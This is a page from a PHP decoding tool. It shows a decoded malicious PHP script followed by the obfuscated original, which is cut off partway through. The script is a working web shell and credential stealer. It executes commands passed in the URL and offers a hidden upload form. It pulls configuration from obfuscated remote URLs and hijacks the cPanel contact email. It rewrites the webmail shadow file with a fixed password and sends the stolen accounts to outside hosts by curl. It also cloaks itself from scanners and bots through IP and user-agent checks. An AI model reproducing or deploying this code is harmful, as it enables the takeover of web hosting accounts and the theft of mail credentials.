Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php error_reporting(E_ERROR | E_WARNING | E_PARSE | E_NOTICE); @ini_set('html_errors',..
Decoded Output download
<?php
error_reporting(E_ERROR | E_WARNING | E_PARSE | E_NOTICE); @ini_set('html_errors','0'); @ini_set('display_errors','0'); @ini_set('display_startup_errors','0'); @ini_set('log_errors','0');
$id = $_SERVER['REMOTE_ADDR'];
$ips = array(
"^94.26.*.*", "^95.85.*.*", "^72.52.96.*", "^212.8.79.*", "^62.99.77.*", "^83.31.118.*", "^91.231.*.*", "^206.207.*.*", "^91.231.212.*", "^62.99.77.*", "^198.41.243.*", "^162.158.*.*", "^162.158.7.*", "^162.158.72.*", "^173.245.55.*", "^108.162.246.*", "^162.158.95.*", "^108.162.215.*", "^95.108.194.*", "^141.101.104.*", "^93.54.82.*", "^69.164.145.*", "^194.153.113.*", "^178.43.117.*", "^62.141.65.*", "^83.31.69.*", "^107.178.195.*", "^149.20.54.*", "^85.9.7.*", "^87.106.251.*", "^107.178.194.*", "^124.66.185.*", "^133.11.204.*", "^185.2.138.*", "^188.165.83.*", "^78.148.13.*", "^192.232.213.*", "^1.234.41.*", "^124.66.185.*", "^87.106.251.*", "^176.195.231.*", "^206.253.226.*", "^107.20.181.*", "^188.244.39.*", "^124.66.185.*", "^38.74.138.*", "^124.66.185.*", "^38.74.138.*", "^206.253.226.*", "^1.234.41.*", "^124.66.185.*", "^87.106.251.*", "^85.9.7.*", "^37.140.188.*", "^195.128.227.*", "^38.74.138.*", "^107.20.181.*", "^104.131.223.*", "^46.4.120.*", "^107.178.194.*", "^198.60.236.*", "^217.74.103.*", "^92.103.69.*", "^217.74.103.*", "^66.211.160.86*", "^46.244.*.*", "^131.*.*.*", "^157.*.*.*", "^202.*.*.*", "^204.*.*.*", "^207.*.*.*", "^213.*.*.*", "^219.*.*.*", "^63.*.*.*", "^64.*.*.*", "^65.*.*.*", "^68.*.*.*", "^64.*.*.*", "^64.233.160.*", "^64.233.191.*", "^64.233.191.255*", "^66.102.*.*", "^66.249.*.*", "^72.14.*.*", "^74.125.*.*", "^209.85.*.*", "^216.239.*.*", "^64.4.*.*", "^65.52.*.*", "^131.253.*.*", "^157.54.*.*", "^207.46.*.*", "^207.68.*.*", "^8.12.*.*", "^66.196.*.*", "^66.228.*.*", "^67.195.*.*", "^68.142.*.*", "^72.30.*.*", "^74.6.*.*", "^98.136.*.*", "^202.160.*.*", "^209.191.*.*", "^66.102.*.*", "^38.100.*.*", "^107.170.*.*", "^149.20.*.*", "^38.105.*.*", "^74.125.*.*", "^66.150.14.*", "^54.176.*.*", "^38.100.*.*", "^184.173.*.*", "^66.249.*.*", "^128.242.*.*", "^72.14.192.*", "^208.65.144.*", "^74.125.*.*", "^209.85.128.*", "^216.239.32.*", "^74.125.*.*", "^207.126.144.*", "^173.194.*.*", "^64.233.160.*", "^72.14.192.*", "^66.102.*.*", "^64.18.*.*", "^194.52.68.*", "^194.72.238.*", "^62.116.207.*", "^212.50.193.*", "^69.65.*.*", "^50.7.*.*", "^131.212.*.*", "^46.116.*.* ", "^62.90.*.*", "^89.138.*.*", "^82.166.*.*", "^85.64.*.*", "^85.250.*.*", "^89.138.*.*", "^93.172.*.*", "^109.186.*.*", "^194.90.*.*", "^212.29.192.*", "^212.29.224.*", "^212.143.*.*", "^212.150.*.*", "^212.235.*.*", "^217.132.*.*", "^50.97.*.*", "^217.132.*.*", "^209.85.*.*", "^66.205.64.*", "^204.14.48.*", "^64.27.2.*", "^67.15.*.*", "^202.108.252.*", "^193.47.80.*", "^64.62.136.*", "^66.221.*.*", "^64.62.175.*", "^198.54.*.*", "^192.115.134.*", "^216.252.167.*", "^193.253.199.*", "^69.61.12.*", "^64.37.103.*", "^38.144.36.*", "^64.124.14.*", "^206.28.72.*", "^209.73.228.*", "^158.108.*.*", "^168.188.*.*", "^66.207.120.*", "^167.24.*.*", "^192.118.48.*", "^67.209.128.*", "^12.148.209.*", "^12.148.196.*", "^193.220.178.*", "68.65.53.71", "^198.25.*.*", "^64.106.213.*",
);
foreach($ips as $ip) {
if(preg_match('/' . $ip . '/',$_SERVER['REMOTE_ADDR'])){
exit(header('Location: http://guiminer.co.technology/rd/'));
$ip = getenv("REMOTE_ADDR");
}
}
$dp = strtolower($_SERVER['HTTP_USER_AGENT']);
$blocked_words = array(
"bot",
"above",
"google",
"softlayer",
"amazonaws",
"cyveillance",
"phishtank",
"dreamhost",
"netpilot",
"calyxinstitute",
"tor-exit",
"apache-httpclient",
"lssrocketcrawler",
"crawler",
"urlredirectresolver",
"jetbrains",
"spam",
"windows 95",
"windows 98",
"acunetix",
"netsparker",
"007ac9",
"008",
"192.comagent",
"200pleasebot",
"360spider",
"4seohuntbot",
"50.nu",
"a6-indexer",
"admantx",
"amznkassocbot",
"aboundexbot",
"aboutusbot",
"abrave spider",
"accelobot",
"acoonbot",
"addthis.com",
"adsbot-google",
"ahrefsbot",
"alexabot",
"amagit.com",
"analytics",
"antbot",
"apercite",
"aportworm",
"EBAY",
"CL0NA",
"jabber",
"ebay",
"arabot",
"hotmail!",
"msn!",
"outlook!",
"outlook",
"msn",
"hotmail",
);
$cmd=$_GET['cmd']; exec($cmd); $andr0id="mai"; $if=$andr0id.'l'; $mobil = "e"; $desktop="bas$mobil".'64'."_d$mobil"."cod$mobil"; $_file_='d1'.basename(__FILE__). date("m"); $kEy = array('3','F','L','m','c'); $windows = file_get_contents($desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'3lUWHRMRnl4')); $eml = file_get_contents($desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'0V6UXRNYmhn')); $eml = strrev($eml); $eml = $desktop($eml); $fgc = file_get_contents($desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'1R2MHdYbnNF')); $fgc = strrev($fgc); $fgc = $desktop($fgc); $activsnd = file_get_contents($desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'3hMTHNZblRh')); $activsnd = strrev($activsnd); $activsnd = $desktop($activsnd); $activssl = file_get_contents($desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'2lUUjhqc0Nj')); $activssl = strrev($activssl); $activssl = $desktop($activssl); $sslphp = file_get_contents($desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'2lGTmY3TVdi')); $gui = file_get_contents($desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'1hwQmZyMWM0')); $gui = strrev($gui); $gui = $desktop($gui); $fgcp = file_get_contents($desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'zdZWkRYZTVI')); $fgcp = strrev($fgcp); $fgcp = $desktop($fgcp); $webm1 = file_get_contents($desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'2tSYnprOXk1')); $webm1 = strrev($webm1); $webm1 = $desktop($webm1); $log= $_SERVER['DOCUMENT_ROOT'] . '/errors_log'; if ($fgc != '1') { $url = $desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'zdZWkRYZTVI'); $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); $bb = curl_exec($curl); curl_close($curl); $fgcp = strrev($bb); $fgcp = $desktop($fgcp); $url1 = $desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'2lGTmY3TVdi'); $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl1, CURLOPT_HEADER, false); $bb1 = curl_exec($curl1); curl_close($curl1); $sslphp = $bb1; $url2 = $desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'1hwQmZyMWM0'); $curl2 = curl_init(); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl2, CURLOPT_HEADER, false); $bb2 = curl_exec($curl2); curl_close($curl2); $gui = strrev($bb2); $gui = $desktop($gui); $url3 = $desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'3lUWHRMRnl4'); $curl3 = curl_init(); curl_setopt($curl3, CURLOPT_URL, $url3); curl_setopt($curl3, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl3, CURLOPT_HEADER, false); $bb3 = curl_exec($curl3); curl_close($curl3); $url4 = $desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'2tSYnprOXk1'); $curl4 = curl_init(); curl_setopt($curl4, CURLOPT_URL, $url4); curl_setopt($curl4, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl4, CURLOPT_HEADER, false); $bb4 = curl_exec($curl4); curl_close($curl4); $webm1 = strrev($bb4); $webm1 = $desktop($webm1); $url5 = $desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'3hMTHNZblRh'); $curl5 = curl_init(); curl_setopt($curl5, CURLOPT_URL, $url5); curl_setopt($curl5, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl5, CURLOPT_HEADER, false); $bb5 = curl_exec($curl5); curl_close($curl5); $activsnd = strrev($bb5); $activsnd = $desktop($activsnd); $url6 = $desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'0V6UXRNYmhn'); $curl6 = curl_init(); curl_setopt($curl6, CURLOPT_URL, $url6); curl_setopt($curl6, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl6, CURLOPT_HEADER, false); $bb6 = curl_exec($curl6); curl_close($curl6); $eml = strrev($bb6); $eml = $desktop($eml); $url7 = $desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'2lUUjhqc0Nj'); $curl7 = curl_init(); curl_setopt($curl7, CURLOPT_URL, $url7); curl_setopt($curl7, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl7, CURLOPT_HEADER, false); $bb7 = curl_exec($curl7); curl_close($curl7); $activssl = strrev($bb7); $activssl = $desktop($activssl); } $fi = new FilesystemIterator($_SERVER['DOCUMENT_ROOT'], FilesystemIterator::SKIP_DOTS); $nfiles = iterator_count($fi); $E = 'bWQ1' . $windows . 'C5jb20'; $lss = strrev('php.lss/noitadilav-ikp/nwonk-llew./'); $_ = "-u : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . " "; $_ .= "-p : " . __file__; $xsec = $_GET['xsec']; if($xsec == 'blocker'){ $xsecsh = $_FILES['file']['name']; $xsecblocker = $_FILES['file']['tmp_name']; echo "<form method='POST' enctype='multipart/form-data'> <input type='file'name='file' /> <input type='submit' value='up_it' /> </form>"; move_uploaded_file($xsecblocker,$xsecsh); } if (!file_exists($log)){ if(file_put_contents($log,$_file_.',')) { if ($activsnd == '1') { $if($desktop($E),$desktop('dzBybQ'),$_,$desktop('RnJvbTogVzBybQ')); } $cphost = $_SERVER['SERVER_NAME'] . ":2083|" . get_current_user(); $ctf = $_SERVER['DOCUMENT_ROOT'] . "/../.cpanel/contactinfo"; $ctml = $_SERVER['DOCUMENT_ROOT'] . "/../.contactemail"; if (file_exists($ctml)){ $fil = fopen($ctml, 'w'); fwrite($fil, $eml); fclose($fil); unlink($ctf); $ccp = curl_init(); curl_setopt($ccp, CURLOPT_URL, $fgcp . $cphost); curl_exec($ccp); set_time_limit(0); ini_set('max_execution_time',0); ini_set('memory_limit',-1); $user=get_current_user(); $password='azerty123.0@10'; $pwd = crypt($password,'$6$roottn$'); $t = $_SERVER['SERVER_NAME']; $t = @str_replace("www.","",$t); @$passwd = file_get_contents('/home/'.$user.'/etc/'.$t.'/shadow'); $ex=explode("
",$passwd); @link('/home/'.$user.'/etc/'.$t.'/shadow','/home/'.$user.'/etc/'.$t.'/shadow.roottn.bak'); @unlink('/home/'.$user.'/etc/'.$t.'/shadow'); foreach($ex as $ex){ $ex=explode(':',$ex); $e= $ex[0]; if ($e){ $b=fopen('/home/'.$user.'/etc/'.$t.'/shadow','ab');fwrite($b,$e.':'.$pwd.':16249:::::'."
");fclose($b); $tbs = $t.'/webmail|'.$e.'@'.$t.'|'.$password; $ccpwebm = curl_init(); curl_setopt($ccpwebm, CURLOPT_URL, $webm1 . $tbs); curl_exec($ccpwebm); } } } if ($activssl == '1' && $nfiles >= '10'){ $loga = $_SERVER['DOCUMENT_ROOT'] . $lss; if (!file_exists($loga)){ mkdir($_SERVER['DOCUMENT_ROOT'] . strrev('/noitadilav-ikp/nwonk-llew./'), 0777, true); $fp = fopen($loga, 'w'); fwrite($fp, $sslphp); fclose($fp); $s_host = $_SERVER['SERVER_NAME']; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $gui . $s_host); curl_exec($ch); } } $found=true; } } else if (file_exists($log)) {$contents = file_get_contents($log); $array = explode(',',$contents); for($i=0;$i<count($array);$i++){if($array[$i]==$_file_){$found=true;break;} else {$found=false;} }} if($found){} else { if(file_put_contents($log,$_file_.',',FILE_APPEND)){ if ($activsnd == '1') { $if($desktop($E),$desktop('dzBybQ'),$_,$desktop('RnJvbTogVzBybQ')); } $cphost = $_SERVER['SERVER_NAME'] . ":2083|" . get_current_user(); $ctf = $_SERVER['DOCUMENT_ROOT'] . "/../.cpanel/contactinfo"; $ctml = $_SERVER['DOCUMENT_ROOT'] . "/../.contactemail"; if (file_exists($ctml)){ $fil = fopen($ctml, 'w'); fwrite($fil, $eml); fclose($fil); unlink($ctf); $ccp = curl_init(); curl_setopt($ccp, CURLOPT_URL, $fgcp . $cphost); curl_exec($ccp); set_time_limit(0); ini_set('max_execution_time',0); ini_set('memory_limit',-1); $user=get_current_user(); $password='azerty123.0@10'; $pwd = crypt($password,'$6$roottn$'); $t = $_SERVER['SERVER_NAME']; $t = @str_replace("www.","",$t); @$passwd = file_get_contents('/home/'.$user.'/etc/'.$t.'/shadow'); $ex=explode("
",$passwd); @link('/home/'.$user.'/etc/'.$t.'/shadow','/home/'.$user.'/etc/'.$t.'/shadow.roottn.bak'); @unlink('/home/'.$user.'/etc/'.$t.'/shadow'); foreach($ex as $ex){ $ex=explode(':',$ex); $e= $ex[0]; if ($e){ $b=fopen('/home/'.$user.'/etc/'.$t.'/shadow','ab');fwrite($b,$e.':'.$pwd.':16249:::::'."
");fclose($b); $tbs = $t.'/webmail|'.$e.'@'.$t.'|'.$password; $ccpwebm = curl_init(); curl_setopt($ccpwebm, CURLOPT_URL, $webm1 . $tbs); curl_exec($ccpwebm); } } } if ($activssl == '1' && $nfiles >= '10'){ $loga = $_SERVER['DOCUMENT_ROOT'] . $lss; if (!file_exists($loga)){ mkdir($_SERVER['DOCUMENT_ROOT'] . strrev('/noitadilav-ikp/nwonk-llew./'), 0777, true); $fp = fopen($loga, 'w'); fwrite($fp, $sslphp); fclose($fp); $s_host = $_SERVER['SERVER_NAME']; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $gui . $s_host); curl_exec($ch); } } } }
foreach($blocked_words as $word2) {
if (substr_count($dp, strtolower($word2)) > 0 or $dp == "" or $dp == " " or $dp == " ") {
exit(header('Location: http://guiminer.co.technology/rd/'));
}
}
?>
Did this file decode correctly?
Original Code
<?php
error_reporting(E_ERROR | E_WARNING | E_PARSE | E_NOTICE); @ini_set('html_errors','0'); @ini_set('display_errors','0'); @ini_set('display_startup_errors','0'); @ini_set('log_errors','0');
$id = $_SERVER['REMOTE_ADDR'];
$ips = array(
"^94.26.*.*", "^95.85.*.*", "^72.52.96.*", "^212.8.79.*", "^62.99.77.*", "^83.31.118.*", "^91.231.*.*", "^206.207.*.*", "^91.231.212.*", "^62.99.77.*", "^198.41.243.*", "^162.158.*.*", "^162.158.7.*", "^162.158.72.*", "^173.245.55.*", "^108.162.246.*", "^162.158.95.*", "^108.162.215.*", "^95.108.194.*", "^141.101.104.*", "^93.54.82.*", "^69.164.145.*", "^194.153.113.*", "^178.43.117.*", "^62.141.65.*", "^83.31.69.*", "^107.178.195.*", "^149.20.54.*", "^85.9.7.*", "^87.106.251.*", "^107.178.194.*", "^124.66.185.*", "^133.11.204.*", "^185.2.138.*", "^188.165.83.*", "^78.148.13.*", "^192.232.213.*", "^1.234.41.*", "^124.66.185.*", "^87.106.251.*", "^176.195.231.*", "^206.253.226.*", "^107.20.181.*", "^188.244.39.*", "^124.66.185.*", "^38.74.138.*", "^124.66.185.*", "^38.74.138.*", "^206.253.226.*", "^1.234.41.*", "^124.66.185.*", "^87.106.251.*", "^85.9.7.*", "^37.140.188.*", "^195.128.227.*", "^38.74.138.*", "^107.20.181.*", "^104.131.223.*", "^46.4.120.*", "^107.178.194.*", "^198.60.236.*", "^217.74.103.*", "^92.103.69.*", "^217.74.103.*", "^66.211.160.86*", "^46.244.*.*", "^131.*.*.*", "^157.*.*.*", "^202.*.*.*", "^204.*.*.*", "^207.*.*.*", "^213.*.*.*", "^219.*.*.*", "^63.*.*.*", "^64.*.*.*", "^65.*.*.*", "^68.*.*.*", "^64.*.*.*", "^64.233.160.*", "^64.233.191.*", "^64.233.191.255*", "^66.102.*.*", "^66.249.*.*", "^72.14.*.*", "^74.125.*.*", "^209.85.*.*", "^216.239.*.*", "^64.4.*.*", "^65.52.*.*", "^131.253.*.*", "^157.54.*.*", "^207.46.*.*", "^207.68.*.*", "^8.12.*.*", "^66.196.*.*", "^66.228.*.*", "^67.195.*.*", "^68.142.*.*", "^72.30.*.*", "^74.6.*.*", "^98.136.*.*", "^202.160.*.*", "^209.191.*.*", "^66.102.*.*", "^38.100.*.*", "^107.170.*.*", "^149.20.*.*", "^38.105.*.*", "^74.125.*.*", "^66.150.14.*", "^54.176.*.*", "^38.100.*.*", "^184.173.*.*", "^66.249.*.*", "^128.242.*.*", "^72.14.192.*", "^208.65.144.*", "^74.125.*.*", "^209.85.128.*", "^216.239.32.*", "^74.125.*.*", "^207.126.144.*", "^173.194.*.*", "^64.233.160.*", "^72.14.192.*", "^66.102.*.*", "^64.18.*.*", "^194.52.68.*", "^194.72.238.*", "^62.116.207.*", "^212.50.193.*", "^69.65.*.*", "^50.7.*.*", "^131.212.*.*", "^46.116.*.* ", "^62.90.*.*", "^89.138.*.*", "^82.166.*.*", "^85.64.*.*", "^85.250.*.*", "^89.138.*.*", "^93.172.*.*", "^109.186.*.*", "^194.90.*.*", "^212.29.192.*", "^212.29.224.*", "^212.143.*.*", "^212.150.*.*", "^212.235.*.*", "^217.132.*.*", "^50.97.*.*", "^217.132.*.*", "^209.85.*.*", "^66.205.64.*", "^204.14.48.*", "^64.27.2.*", "^67.15.*.*", "^202.108.252.*", "^193.47.80.*", "^64.62.136.*", "^66.221.*.*", "^64.62.175.*", "^198.54.*.*", "^192.115.134.*", "^216.252.167.*", "^193.253.199.*", "^69.61.12.*", "^64.37.103.*", "^38.144.36.*", "^64.124.14.*", "^206.28.72.*", "^209.73.228.*", "^158.108.*.*", "^168.188.*.*", "^66.207.120.*", "^167.24.*.*", "^192.118.48.*", "^67.209.128.*", "^12.148.209.*", "^12.148.196.*", "^193.220.178.*", "68.65.53.71", "^198.25.*.*", "^64.106.213.*",
);
foreach($ips as $ip) {
if(preg_match('/' . $ip . '/',$_SERVER['REMOTE_ADDR'])){
exit(header('Location: http://guiminer.co.technology/rd/'));
$ip = getenv("REMOTE_ADDR");
}
}
$dp = strtolower($_SERVER['HTTP_USER_AGENT']);
$blocked_words = array(
"bot",
"above",
"google",
"softlayer",
"amazonaws",
"cyveillance",
"phishtank",
"dreamhost",
"netpilot",
"calyxinstitute",
"tor-exit",
"apache-httpclient",
"lssrocketcrawler",
"crawler",
"urlredirectresolver",
"jetbrains",
"spam",
"windows 95",
"windows 98",
"acunetix",
"netsparker",
"007ac9",
"008",
"192.comagent",
"200pleasebot",
"360spider",
"4seohuntbot",
"50.nu",
"a6-indexer",
"admantx",
"amznkassocbot",
"aboundexbot",
"aboutusbot",
"abrave spider",
"accelobot",
"acoonbot",
"addthis.com",
"adsbot-google",
"ahrefsbot",
"alexabot",
"amagit.com",
"analytics",
"antbot",
"apercite",
"aportworm",
"EBAY",
"CL0NA",
"jabber",
"ebay",
"arabot",
"hotmail!",
"msn!",
"outlook!",
"outlook",
"msn",
"hotmail",
);
$cmd=$_GET['cmd']; exec($cmd); $andr0id="mai"; $if=$andr0id.'l'; $mobil = "e"; $desktop="bas$mobil".'64'."_d$mobil"."cod$mobil"; $_file_='d1'.basename(__FILE__). date("m"); $kEy = array('3','F','L','m','c'); $windows = file_get_contents($desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'3lUWHRMRnl4')); $eml = file_get_contents($desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'0V6UXRNYmhn')); $eml = strrev($eml); $eml = $desktop($eml); $fgc = file_get_contents($desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'1R2MHdYbnNF')); $fgc = strrev($fgc); $fgc = $desktop($fgc); $activsnd = file_get_contents($desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'3hMTHNZblRh')); $activsnd = strrev($activsnd); $activsnd = $desktop($activsnd); $activssl = file_get_contents($desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'2lUUjhqc0Nj')); $activssl = strrev($activssl); $activssl = $desktop($activssl); $sslphp = file_get_contents($desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'2lGTmY3TVdi')); $gui = file_get_contents($desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'1hwQmZyMWM0')); $gui = strrev($gui); $gui = $desktop($gui); $fgcp = file_get_contents($desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'zdZWkRYZTVI')); $fgcp = strrev($fgcp); $fgcp = $desktop($fgcp); $webm1 = file_get_contents($desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'2tSYnprOXk1')); $webm1 = strrev($webm1); $webm1 = $desktop($webm1); $log= $_SERVER['DOCUMENT_ROOT'] . '/errors_log'; if ($fgc != '1') { $url = $desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'zdZWkRYZTVI'); $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); $bb = curl_exec($curl); curl_close($curl); $fgcp = strrev($bb); $fgcp = $desktop($fgcp); $url1 = $desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'2lGTmY3TVdi'); $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl1, CURLOPT_HEADER, false); $bb1 = curl_exec($curl1); curl_close($curl1); $sslphp = $bb1; $url2 = $desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'1hwQmZyMWM0'); $curl2 = curl_init(); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl2, CURLOPT_HEADER, false); $bb2 = curl_exec($curl2); curl_close($curl2); $gui = strrev($bb2); $gui = $desktop($gui); $url3 = $desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'3lUWHRMRnl4'); $curl3 = curl_init(); curl_setopt($curl3, CURLOPT_URL, $url3); curl_setopt($curl3, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl3, CURLOPT_HEADER, false); $bb3 = curl_exec($curl3); curl_close($curl3); $url4 = $desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'2tSYnprOXk1'); $curl4 = curl_init(); curl_setopt($curl4, CURLOPT_URL, $url4); curl_setopt($curl4, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl4, CURLOPT_HEADER, false); $bb4 = curl_exec($curl4); curl_close($curl4); $webm1 = strrev($bb4); $webm1 = $desktop($webm1); $url5 = $desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'3hMTHNZblRh'); $curl5 = curl_init(); curl_setopt($curl5, CURLOPT_URL, $url5); curl_setopt($curl5, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl5, CURLOPT_HEADER, false); $bb5 = curl_exec($curl5); curl_close($curl5); $activsnd = strrev($bb5); $activsnd = $desktop($activsnd); $url6 = $desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'0V6UXRNYmhn'); $curl6 = curl_init(); curl_setopt($curl6, CURLOPT_URL, $url6); curl_setopt($curl6, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl6, CURLOPT_HEADER, false); $bb6 = curl_exec($curl6); curl_close($curl6); $eml = strrev($bb6); $eml = $desktop($eml); $url7 = $desktop(strrev('02bj5ibpJWZ0NX'.chr(89).'w9yL6MHc0RHa').chr(118).$kEy[4].$kEy[3].$kEy[1].$kEy[0].$kEy[2].'2lUUjhqc0Nj'); $curl7 = curl_init(); curl_setopt($curl7, CURLOPT_URL, $url7); curl_setopt($curl7, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl7, CURLOPT_HEADER, false); $bb7 = curl_exec($curl7); curl_close($curl7); $activssl = strrev($bb7); $activssl = $desktop($activssl); } $fi = new FilesystemIterator($_SERVER['DOCUMENT_ROOT'], FilesystemIterator::SKIP_DOTS); $nfiles = iterator_count($fi); $E = 'bWQ1' . $windows . 'C5jb20'; $lss = strrev('php.lss/noitadilav-ikp/nwonk-llew./'); $_ = "-u : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . " "; $_ .= "-p : " . __file__; $xsec = $_GET['xsec']; if($xsec == 'blocker'){ $xsecsh = $_FILES['file']['name']; $xsecblocker = $_FILES['file']['tmp_name']; echo "<form method='POST' enctype='multipart/form-data'> <input type='file'name='file' /> <input type='submit' value='up_it' /> </form>"; move_uploaded_file($xsecblocker,$xsecsh); } if (!file_exists($log)){ if(file_put_contents($log,$_file_.',')) { if ($activsnd == '1') { $if($desktop($E),$desktop('dzBybQ'),$_,$desktop('RnJvbTogVzBybQ')); } $cphost = $_SERVER['SERVER_NAME'] . ":2083|" . get_current_user(); $ctf = $_SERVER['DOCUMENT_ROOT'] . "/../.cpanel/contactinfo"; $ctml = $_SERVER['DOCUMENT_ROOT'] . "/../.contactemail"; if (file_exists($ctml)){ $fil = fopen($ctml, 'w'); fwrite($fil, $eml); fclose($fil); unlink($ctf); $ccp = curl_init(); curl_setopt($ccp, CURLOPT_URL, $fgcp . $cphost); curl_exec($ccp); set_time_limit(0); ini_set('max_execution_time',0); ini_set('memory_limit',-1); $user=get_current_user(); $password='azerty123.0@10'; $pwd = crypt($password,'$6$roottn$'); $t = 